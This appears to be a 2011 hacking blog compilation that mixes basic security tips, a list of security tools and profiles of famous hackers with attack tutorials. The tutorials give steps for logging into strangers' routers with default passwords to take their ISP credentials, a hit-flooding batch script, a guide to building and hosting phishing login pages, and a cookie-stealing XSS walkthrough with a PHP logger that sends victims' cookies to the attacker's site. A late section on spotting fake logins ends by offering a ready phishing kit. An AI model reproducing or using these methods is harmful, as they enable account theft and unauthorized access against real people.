
Tuesday, January 11, 2011

Important Security Tips






1. Use anti-virus software:
Viruses spread rapidly and can damage or destroy your computer. New ones appear almost daily. It's critical that you install and update anti-virus software regularly. Use the program to scan all the files on your system once a week, deleting the infected ones.

2. Be wary of e-mail attachments:
A virus can hide in an attachment. Opening it will unleash the virus. Don't open an attachment from anyone you don't know. Even if you do know the sender, an infected attachment may have been surreptitiously sent from an infected machine. The safest thing to do is to scan the attachment with anti-virus software before you open it.





3. Install a firewall on your computer:
A firewall is a software program that blocks unauthorized access to your computer. This is particularly important if you have a broadband connection, such as DSL or a cable modem. Windows XP has a built-in firewall, so make sure it's activated if you use that operating system. If not, we recommend ZoneAlarm. You can download it for free for personal use from Zone Labs. Or, better, use the open source software "Comodo Firewall".

4. Protect your passwords:
Many online services, such as banking, brokerage and e-mail require the use of passwords. A secure password is the first line of defense against cyber-snoops. Use a different password for each account, don't divulge them to anyone and change them periodically.

5. Update security patches for your operating system and web browser:
You've probably read about security "holes" that turn up periodically. Once they are discovered, you can download fixes. For Windows users, an easy way to update your system is to click on the Windows Update option under the Start menu.

6. Back up your data:
Make copies of your files in case they become corrupted, your system fails or your computer is damaged or stolen. Get in the habit of doing this regularly, at least once a week.

Hack This Website Test

If you really think you are a hacker, then

Go to www.hack-test.com


Reply with what level you are on

Top 15 Hacking Software


1. Nmap

I think everyone has heard of this one, recently evolved into the 4.x series.

Nmap ("Network Mapper") is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.






Can be used by beginners (-sT) or by pros alike (--packet_trace). A very versatile tool, once you fully understand the results.
Get Nmap Here

2. Nessus Remote Security Scanner

Recently went closed source, but is still essentially free. Works with a client-server framework.

Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.
Get Nessus Here

3. John the Ripper

Yes, JTR 1.7 was recently released!

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.
You can get JTR Here

4. Nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).
Get Nikto Here

5. SuperScan

Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.

If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.

Get SuperScan Here

6. p0f

P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:

- machines that connect to your box (SYN mode),
- machines you connect to (SYN+ACK mode),
- machines you cannot connect to (RST+ mode),
- machines whose communications you can observe.

Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.
Get p0f Here

7. Wireshark (Formerly Ethereal)

Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.

Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.
Get Wireshark Here

8. Yersinia

Yersinia is a network tool designed to take advantage of some weaknesses in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).

The best Layer 2 kit there is.
Get Yersinia Here

9. Eraser

Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.

An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.
Get Eraser Here

10. PuTTY

PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4x0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.
Get PuTTY Here

11. LCP

Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.

A good free alternative to L0phtcrack.

LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack article
Get LCP Here

12. Cain and Abel

My personal favourite for password cracking of any kind.

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.
Get Cain and Abel Here

13. Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.

A good wireless tool as long as your card supports rfmon (look for an Orinoco Gold).
Get Kismet Here

14. NetStumbler

Yes, a decent wireless tool for Windows! Sadly not as powerful as its Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.

NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:

Verify that your network is set up the way you intended.
Find locations with poor coverage in your WLAN.
Detect other networks that may be causing interference on your network.
Detect unauthorized “rogue” access points in your workplace.
Help aim directional antennas for long-haul WLAN links.
Use it recreationally for WarDriving.
Get NetStumbler Here

15. hping

To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.

hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.
Get hping Here

Profile of computers hacker

Profiles of Famous Computer Hackers

As it was mentioned before, the history of hacking is intermixed with the history of computers. Many of the famous computer hackers of the past are the billionaires of today. 









The best-known hacker is Bill Gates, co-founder of Microsoft. Considered the richest person in the world for more than a decade, he became the most successful entrepreneur of the computer industry. His beginnings go back to the 1970's when he designed computer programs for the computer platforms of that era, and ended with the introduction of Windows in the world of personal computers.

After some time away from the media attention, Steve Jobs came back with the introduction of several new products at Apple. The best known of them is the iPod, which has revolutionized the music industry around the world. Jobs started at nearly the same time as Gates, founding Apple and introducing to the market the first home computer, the Apple II.

Although Linus Torvalds was known among the hacker community as the hero who created Linux, the open source operating system, it hasn't been until recent years that people started to wonder if there was another option apart from using Microsoft's operating system.





Profiles of Bad Hackers
Unfortunately, there are as many bad hackers as productive hackers. One of the most famous black hackers is Kevin Mitnick, who broke into the computers of several organizations, including Fujitsu, Motorola, Sun Microsystems and Nokia. He was imprisoned and even today can't use a computer due to a judicial restriction.

Another famous hacker is Vladimir Levin, a mathematician who led a group of Russian hackers and stole ten million dollars from Citibank. Until this day, no one knows how they did it.

Jonathan James's case is a bit more complicated. He was the first juvenile from the teen hackers of the USA to be prosecuted for computer hacking. But that didn't stop him. Later, he was able to access the computer systems of NASA and the US Department of Defense. Finally, he was imprisoned.

Fraud for Sale
Years ago, before the coming of the internet, hackers around the world caused a lot of mayhem in organizations. But now that they have a potential market of hundreds of millions of persons, their options are almost limitless. That's why online fraud is considered one of the cancers of the internet. The only way to protect ourselves from it is to become anti-hackers ourselves, keeping up to date with the most basic knowledge: firewall, antivirus, antispam, constant operating system updates and taking care with suspicious websites.

The effects of computer hacking in our history can't be denied. It is here and it won't disappear. But the most interesting thing about the history of hacking is that it was expected to happen. You only need to check old science fiction books to find it.

How to catch a hacker

Hackers Beware: A Crook is Caught One Day or the Other









Hackers had broken into the Department of Defense's computers - again. News like this, combined with the fact that other hackers are constantly seeking to steal people's identities, send out spam from innocent computers, and commit other computer crimes by hacking into unauthorized places, makes it necessary for illegal hackers to be caught. If you are one of those who have suffered from a hack attack, then you may be one of those who say: "I need an IP specialist to catch a hacker." This article will show you some things that you can do.





How Are Hackers Caught?
Microsoft and some other software companies have been notified - yes, by hackers - that there are many "holes" in Windows that a hacker can take advantage of. Microsoft has responded by attempting to fix the "holes" each time one is pointed out. Then, it sends out a patch to block hackers from attacking through that "hole." Keeping up with the updates from Microsoft is one way to close down the problems that exist in the Windows software - though it is unknown if all such "holes" will ever be known.

Normally, it is rather hard to notice that a hacker has hacked into your computer. If all he is doing is having a look around, or taking minimum amounts of data - you really cannot be sure that you are being hacked. There are some effects of computer hacking, though, that might tip you off. Here are a couple of ways to detect hackers.

Detecting Hackers
Hackers, by nature, are very stealthy. They can easily gain access to your computer through the Internet without your knowledge - and most of them seem to prefer that approach. Before time is spent on being able to detect a hacker, it should be noted that a determined hacker will not be stopped! They will get in - even to the Department of Defense's systems!

Some common things that might tip you off to an intrusion are:
- Lights showing hard drive activity being busier than what your own activities call for
- Suspicious files left on your computer - often in the Windows Temp directory with a .tmp suffix
- Obvious tampering - destroyed files, missing files, etc.
- Or, the worst case - someone's taking money out of your bank account or using your credit cards (Please note, though, that this could also be the result of phishing - not necessarily hacking)
- Your firewall keeps receiving multiple packets from a single web address and notifies you.


History of hacking

Tips to become a hacker

Certainly there are many sources of information available that can give you computer hacking basics. There is actually some misconception about who a real hacker is. Hacking computers is performed by one who knows computers very well - even the extra tricks of a computer and electronics. He can easily tweak these according to his needs and become a hacker. This is the way the term was used when Bill Gates was inventing Windows.









Those who are often referred to as hackers today should actually be called "crackers" - people who do not have authorized access, like a safe-cracker. If you doubt me, and want to know how to be a hacker, then do a search on the term "professional hacker," and you will find many professional and legitimate computer training courses being offered. They are the ones learning the real hacker secrets.

What Are The Basics Needed To Become A Hacker

Everyone has heard of one individual or another that was caught while hacking computers that belonged to this or that organization. Because hacking into computers is highly illegal, it should be mentioned that this article will not mention any real specifics about the subject, and this author would rather gladly encourage you to become a real hacker - professionally.





This article will, however, give a brief overview of criminal hackers, some of their methods, and a few things you can do to make your own computer safer from hack attacks. Here are the things you need to learn on how to become a hacker.

Learn Computers

It should go without saying that the first thing that is needed is to learn about computers. This means study. A lot of reading is involved along with just plain old-fashioned learning how to use a computer. Then, of course, there are the special aspects of computer study. The places where the tips are learned are often two-fold: a friend who has access to a computer, and a variety of places on the Web. But this is also an interesting thing - if a young person has the ability to learn, wants to learn, and can use hacking tutorials - then why not take the time to learn the right things - things that can earn him a lot of money in the legit world? Is it possible that it could be the friend he has that turns him away from the good?

Learn The Websites

Special hacker Web sites, where hackers congregate, exist on the Web - as they do for every other known group of people - whether legal or illegal. Some of these are known to be hacker chat rooms, hacker forums, and regular hacker sites.

Learn The Secrets

It is in these Web sites, and possibly some of the people that he may meet, maybe only online, where he will learn the hacking basics, and learn how to hack.

Tools Hackers Need To Get Into Websites

Some of the tools that a hacker may use are often varied and constantly changing. One such tool that was used last year allowed a hacker to gain control of the computers of those who simply mistyped the word Google - when trying to get the popular search engine. This automatically directed them to a special website that would give them such malware items as Trojan downloaders, backdoors and spyware.

Another tool would be the robot spider. These can be sent out and put on automatic and will look for ports of access into your computer. These spiders are running around all the time and some say that they may hit most computers that are online - up to 50 times a day.

Other tools use email attachments. It is claimed that as much as 65% of all email is spam. And as much as 1 in about 30 emails contains a virus, or some form of malware. This is why having your own virus and spam protection is a must, as well as a good spyware remover. Someone is busy. Once someone has been hacking information on a computer they will often leave a Trojan file that will give them further access - often more than one file. Then they could use your computer to send out spam attacks - without you even knowing that it is taking place. Or, they could simply be hacking your personal information off of your computer. These are just a few of their tools.

How Hackers Avoid Getting Caught

One of the first things that someone would learn from hacking tutorials when studying to be a hacker is how to cover their tracks. Of course, some are better than others. A young hacker is less likely to know all the little things that an expert hacker might know. Besides, the young hacker may be trying to impress others - and get a little careless about covering his tracks. This is why younger hackers are often caught.

An older hacker, on the other hand, will rarely leave any tracks. They know how to use their victim's computers as a tool for a launching place to get into another computer - leaving a phony IP address.

The truth is, and it is a good thing, that computer programmers are getting better software, and hardware (firewalls) that are constantly doing a better job - both in keeping hackers out, and in recording IP addresses better for tracking purposes.

There will always be hackers, and there will always be hackers in prison. The legislation is definitely turning against the hacker - with some hacking crimes becoming equal to terrorism, these days. Kevin Mitnick, a well-known hacker, had the Federal prosecutors accuse him of having caused $291 million in damages to corporate computers. A serious crime, and he remains in jail because of it - unable to touch any more computers.

Even by learning some of the wrong type of hacking basics through hacking tutorials, a young person could start down a wrong path. Hacking computers, though often glorified on TV, is still criminal.

White Hat and Grey Hat Hacker

White Hat and Grey Hat Hacker--- What is the Real Difference?

Thanks to movies and books, our image of hackers has been distorted. What is worse, the public is not able to understand terms like grey hat, white hat, Linux OS, or cracker. However, the truth is that the subculture of the hacker world is more complex than we think. Especially if we consider that these are very intelligent people.









So, what is ethical white hat hacking, and how does it differ from what grey hat hackers do?

The only way to find out is to submerge ourselves in the world of hackers and understand, at least, the most basic concepts.

What Is A White Hat Hacker?

According to Hollywood, a hacker can be a whiz kid who spends too much time with computers and suddenly finds himself submerged in the world of cyber-security or criminal conspirators. On the other hand, he can be a master criminal who wants to obtain huge amounts of money for himself, or even worse, dominate the world.





In the movie Matrix, the concept of hackers changed a bit. Although the agents of the Matrix considered them terrorists, the truth is that they were rebels fighting for the liberty of humanity. Things do not need to reach that extreme, though. We are not at war with intelligent machines so that kind of scenario is a bit dramatic.

Therefore, a hacker is an individual who is capable of modifying computer hardware, or software. They made their appearance before the advent of computers, when determined individuals were fascinated with the possibility of modifying machines. For example, entering a certain code in a telephone in order to make free international calls.

When computers appeared, these people found a new realm where they could exploit their skills. Now they were not limited to the constraints of the physical world; instead, they could travel through the virtual world of computers. Before the internet, they used Bulletin Board Systems (BBS) to communicate and exchange information. However, the real explosion occurred when the Internet appeared.

Today, anyone can become a hacker. Within that denomination, there are three types of hackers. The first one is the black hacker, also known as a cracker, someone who uses his computer knowledge in criminal activities in order to obtain personal benefits. A typical example is a person who exploits the weaknesses of the systems of a financial institution for making some money.

On the other side is the white hat hacker. Although white hat hacking can be considered similar to what a black hacker does, there is an important difference. A white hacker does it with no criminal intention in mind. Companies around the world that want to test their systems contract white hackers. They will test how secure the systems are, and point out any faults that they may find. If you want to become a hacker with a white hat, Linux, a PC and an internet connection are all you need.

Fool keylogger and protect yourself from hackers


When you surf the net at public computers or net cafes, or maybe even at a friend's house, there is a danger that key logger software can steal your password, so I have come up with a simple and effective way to counter it... at least 50%...

Let's see how simply you can fool a key logger.








When you choose passwords, try using simple letters, capitals and numbers in combination.

When you enter them on a public computer, rather than entering the password in sequence, try entering it in pieces.

For this trick, suppose my password is hi2K1987 [DEMO password].

Break your password into 3 pieces and enter them one after another (without using the backspace key). What I did was enter 2k first, then, using the mouse, I went to the start of the password field and entered hi, then I placed the cursor at the end and entered 1987. Now the key logger is simply fooled.

He will read my password as: delghi2k1987 (fooled)





Now imagine if you use a set of numbers for your password and you enter them in a combination…

So, guys, next time you enter your password you know you are safe. It's just a simple trick, so you can use your own imagination.

Page hits flooder

This small program can flood ur page hits.

but you have to dedicate one browser for it.. like internet explorer method:
make a batch file with these lines

@echo off
:1
start C:Progra~1Intern~1iexplore.exe “http://yoursite.com“
ping -n 10 127.0.0.1 >nul
taskkill.exe /im iexplore.exe
goto 1

depending upon your net speed u may increase the 10 secs time wait





with 10 sec time u may have 360 hits in an hour
with 5 sec time u may have 720 hits in an hour

Asterisk Passwords Using Javascript






Want to Reveal the Passwords Hidden Behind Asterisk (****) ?

Follow the steps given below-

1) Open the Login Page of any website. (eg. http://mail.yahoo.com)

2) Type your 'Username' and 'Password'.

3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.

javascript: alert(document.getElementById('Passwd').value);





4) As soon as you press 'Enter', a window pops up showing the password typed by you.

Note: This trick may not work with Firefox.

Hack sify broaband

Step 1: Download any port Scanner (i preffer Super Scan or IPscanner)
Step 2: First Get your ip from
CODE www.whatismyip.com
Asume your IP to be 59.x.x.17
Step 3: copy your ip in IPscanner Software and scan for alive IPs in the below range
start:59.x.x.1 to End:59.x.x.255
Step 4: Then check in your scanner which alive IPs has the port 80 open
Step 5: Enter that alive IP in your web browser
Step 6: It asks for user , pass
Type u
User=admin
Password=admin or password
It is the default password for most of the routers.
if denied then use on another alive IP
Step 7: If success then it will show router settings page of tht IP user
There goto Home -> Wan Setting and the username and password of his account will appear there.





Step 8: use ShowPassword or Revelation software to view the password in asterisks
Now You have Username/Password
Enjoy!

Create your own f@ke login page!!!

This goes into more detail on how to create a fake page to login, and get redirected while it is sending a email of the password and username to your inbox. If you found this easy, then try out the post, “How to Hack Gmail, Yahoo, Hotmail, Orkut or Any Other”

Fake login page is a fake page which you can use to hack others username and password. Fake login page looks exactly like the original page and if someone login in your page using his original username and password, the username and password will be mailed to you The process of Hacking anyone’s id using fake login pages is known as Phishing

Now let’s learn how to create your very own fake login page.
{1} Open www.jotform.com and Sign Up.
{2} then Login there with your newly registered account.
{3} now click on ‘ Create your first form’.
{4} Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries, select the particular entry and then click on the cross sign.)
{5} Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo)
{6} Now Click on ‘Power Tool’ Option (In right hand side…)
{7} Double click on ‘Password Box’. Now Click the newly form password entry to edit it. Rename it as ‘Password:’
{8} Now Click on ‘Properties’ Option (In right hand side…). These are the form properties.





{9} You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.
{10} Now in Thank You URL you must put some link, like http://www.google.com or anything. Actually after entering username & password, user will get redirect to this url.(Don’t leave it blank…)
{11} Now Click on ‘Save’. After saving, click on ‘Source’ Option.
{12} Now you can see two Options, namely ‘Option1′ & ‘Option2′. Copy the full code of ‘Option2′.
{13} Now open Notepad text editor and write the following code their.
Paste the Option2 code here
{14} And now save this as index.html. And then host it, mean you will have to put it on the internet so that everyone can view it. Now i think that you would be knowing it and if in case you do not know it please leave a comment with your email-id and i will mail you how to do it. Now you can view it by typing the url in the address bar.

NOTE: If u want to send it to the internet, then first you will have to create a hosting account which you can create on www.110mb.com and there are many other sites which you can find on the internet very easily.

I suppose that you created your account at 110mb.com

now login to your account then click on “File Manager”, then click on “upload files” or just “upload”. Then select the file which you want to send to the internet and click on upload. And you are done.

Now you can access you file on the net by just typing the url ofthe file.

And you will receive password of the users that login to your site through email-id which you’ve entered while creating the form. 

Cookie stealing

Cookie stealing is one of the most fundamental aspects of XSS (cross-site scripting).
Why is the cookie so important? Well, first you should see exactly what sort of information is stored in a cookie. Go to a website that requires a login, and after logging in erase everything in your address bar and type this line of code:

Code:
javascript:alert(document.cookie)

After you press enter, you should see a pop-up window with some information in it (that is, if this site uses cookies). This is the data that is stored in your cookie.




Here’s an example of what might be in your cookie:
Code:
username=CyberPhreak; password=ilikepie

This is, of course, a very insecure cookie. If any sort of vulnerability was found that allowed for someone to view other people’s cookies, every user account is possibly compromised. You’ll be hard-pressed to find a site with cookies like these. However, it is very common (unfortunately) to find sites with hashes of passwords within the cookie. The reason that this is unfortunate is because hashes can be cracked, and oftentimes just knowing the hash is enough.

Now you know why cookies are important; they usually have important information about the user in them. But how would we go about getting or changing other users’ cookies? This is the process of cookiestealing.

Cookiestealing is a two-part process. You need to have a script to accept the cookie, and you need to have a way of sending the cookie to your script. Writing the script to accept the cookie is the easy part, whereas finding a way to send it to your script is the hard part. I’ll show you an example of a PHP script that accepts cookies:

Code:
$cookie = $_GET['cookie'];
$log = fopen(”log.txt”, “a”);
fwrite($log, $cookie .”n”);
fclose($log);
?>

And there you have it, a simple cookiestealer. The way this script works is that it accepts the cookie when it is passed as a variable, in this case ‘cookie’ in the URL, and then saves it to a file called ‘log.txt’. For example:

Code:
http://yoursite.com/steal.php?cookie=

steal.php is the filename of the script we just wrote, ? lets the script know that we are going to pass some variables to it, and after that we can set cookie equal to whatever we want, but what we want to do is set cookie equal to the cookie from the site. This is the second and harder part of the cookiestealer.

Most websites apply some sort of filter to input, so that you can’t directly insert your own code. XSS deals with finding exploits within filters, allowing you to put your own code into a website. This might sound difficult, and in most cases it’s not easy, but it can be very simple. 

Any website that allows you to post text potentially allows you to insert your own code into the website. Some examples of these types of sites are forums, guestbooks, any site with a “member profile”, etc. And any of these sites that have users who log in also probably use cookies. Now you know what sort of sites might be vulnerable to cookiestealing.

Let’s assume that we have a website that someone made. This website has user login capability as well as a guestbook. And let’s also assume that this website doesn’t have any kind of filtering on what can be put into the guestbook. This means that you can put HTML and JavaScript directly into your post in the guestbook. I’ll give you an example of some code that we could put into a guestbook post that would send the user’s cookie to our script:

Code:
Now whenever someone views the page that you posted this on, they will be redirected to your script with their cookie from this site in the URL. If you were to look at log.txt now, you’d see the cookies of whoever looked at that page.

But cookiestealing is never that easy. Let’s assume now that the administrator of this site got smart, and decided to filter out script tags. Now your code doesn’t work, so we have to try and evade the filter. In this instance, it’s easy enough:

Code:
Click Me
In this case, when the user clicks on the link they will be sent to your stealer with their cookie. Cookiestealing, like all XSS attacks, is mostly about figuring out how to get around filters.
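
The defensive side of the guestbook scenario above, as an added example (Node.js, not code from the original post): it compares the script-tag filter with output encoding on two constructed posts, and builds a session cookie that holds only a random token and is marked HttpOnly so that page script cannot read it through document.cookie. The function names, the `sid` cookie name and the sample posts are assumptions made for the illustration.

```javascript
const crypto = require("crypto");

// The filter the article describes: delete <script> tags, leave the rest.
function stripScriptTags(input) {
  return input.replace(/<\/?script[^>]*>/gi, "");
}

// Output encoding: characters with meaning in HTML become entities, so a
// guestbook post can only ever be displayed as text.
const ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// Session cookie carrying only a random token (no username, password or
// hash). HttpOnly hides it from document.cookie; Secure restricts it to HTTPS.
function sessionCookie() {
  const token = crypto.randomBytes(32).toString("hex");
  return `sid=${token}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// True if the browser would still parse a tag out of this string.
function containsTag(html) {
  return /<[a-z\/!]/i.test(html);
}

// Constructed guestbook posts with harmless alert(1) markers.
const POSTS = [
  "<script>alert(1)</script>",
  '<a href="#" onclick="alert(1)">Click Me</a>',
];

for (const post of POSTS) {
  console.log("blacklist:", containsTag(stripScriptTags(post)) ? "markup survives" : "text only");
  console.log("encoded:  ", containsTag(escapeHtml(post)) ? "markup survives" : "text only");
}
console.log("Set-Cookie:", sessionCookie());
```

The second post passes through the tag blacklist untouched, while encoding on output turns both posts into inert text.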

Protect yourself from fake login pages

Using fake login pages is the easiest way to hack passwords. Identifying a fake login page is very easy, but many people neglect to do some small checks before entering their login details and fall into the trap. I have seen a person paying $500 for a fake login page of PayPal. This proves that there are still people falling into this trap. This is just an example; there are many fake websites of banks, Yahoo Mail, Gmail, Orkut, MySpace, etc.
This post is an attempt to show what a hacker does to hack your password using fake login pages and how to protect yourself from those fake logins. I will try to keep this post as simple as possible; there may be some technical details which you can safely skip. Warning: I strongly advise you not to try this on anyone; it may spoil your relationship with the person on whom you are trying it and you may even end up behind bars.

What goes on behind the scenes when you enter your login details in a login form?

When you enter your login details in any login form and hit enter, they are submitted to another page which reads these login details and checks the database to see whether you entered the correct username and password. If yes, you will be taken to your account; otherwise you will get an error page.

What does a hacker do?



A hacker creates a fake page which looks exactly the same as the original page and somehow tricks you into entering your login details in that page. These login details are then submitted to a file. At this stage the hacker has two options: he can either store the login details on his server or he can have them mailed directly to his email ID. All of the above happens behind the scenes; you will have no clue of it. When you enter your login details for the first time, your details are submitted to the hacker and you will be directed to an error page (this is the original error page). When you enter your login details again, you will be logged in to your account. It’s quite common for us to enter the login details wrongly sometimes, so you will not become suspicious when you get the error page.

How to identify fake login page traps?

Never enter your login details in unknown sites.
Always type the address directly into the browser.
Do not follow the links you get in mails and chats, even if they are from your friends.
Always look closely at the address bar and verify that the address is correct. Check the screenshot below. Some people buy domains which look similar to the original site, for example: 0rkut for orkut, pay-pal for paypal, yahooo for yahoo. Sometimes you may overlook these small differences and fall into the trap.
Please report to the hosting site or the original site owner when you find a fake login page.
If you feel like you entered your details in a fake login page, change your password immediately.
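
The address-bar check from the list above can also be automated. This added example (not part of the original post) flags hostnames whose name imitates a trusted site through the tricks the post mentions: a digit in place of a letter, an inserted hyphen, or a repeated letter. The `TRUSTED` list, the digit map and the function names are assumptions for the illustration.

```javascript
// Assumed allow-list; extend it with the sites you actually log in to.
const TRUSTED = ["orkut.com", "paypal.com", "yahoo.com"];

// Digits commonly substituted for look-alike letters.
const DIGIT_TO_LETTER = { "0": "o", "1": "l", "3": "e", "5": "s" };

// Reduce a name to a "skeleton" so that visually similar names compare equal:
// lower-case, drop hyphens, map look-alike digits, collapse repeated letters.
function skeleton(name) {
  return name
    .toLowerCase()
    .replace(/-/g, "")
    .replace(/[0135]/g, (d) => DIGIT_TO_LETTER[d])
    .replace(/(.)\1+/g, "$1");
}

// Last two labels of the hostname. Simplification: ignores multi-part
// suffixes such as co.uk, which need the Public Suffix List.
function registeredDomain(hostname) {
  return hostname.toLowerCase().replace(/\.$/, "").split(".").slice(-2).join(".");
}

// Returns the trusted domain being imitated, or null if the host is either
// genuinely trusted or unrelated to any trusted name.
function imitatedDomain(hostname) {
  const domain = registeredDomain(hostname);
  if (TRUSTED.includes(domain)) return null; // exact match: the real site
  const name = domain.split(".")[0];
  for (const trusted of TRUSTED) {
    if (skeleton(name) === skeleton(trusted.split(".")[0])) return trusted;
  }
  return null;
}

// Constructed sample hostnames based on the look-alikes named in the post.
for (const host of ["www.0rkut.com", "pay-pal.com", "login.yahooo.com", "mail.yahoo.com"]) {
  console.log(host, "->", imitatedDomain(host) || "no look-alike detected");
}
```

A null result only means the name does not resemble an entry in the list; it is not proof that a site is genuine.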
Now let’s go on with the trick..

You have to upload the fake login page on some server with PHP support. There are many free web hosting services available on the net; first sign up for any one of them. Google for some free web hosting services, you will find many. Upload the files in the zipped folder on to your server and give the link of the fake login page to the person whose password you want to know. When the person enters his email ID and password into the fake login page, they will be stored in an HTML file named “passwd.htm” on your server in the same directory where you uploaded the login page. Check that text file to get the passwords you wanted.
Here is the demo of the trick
Note: Don’t enter your actual password

click here to view the fake login page of yahoo

The password you entered is saved into this page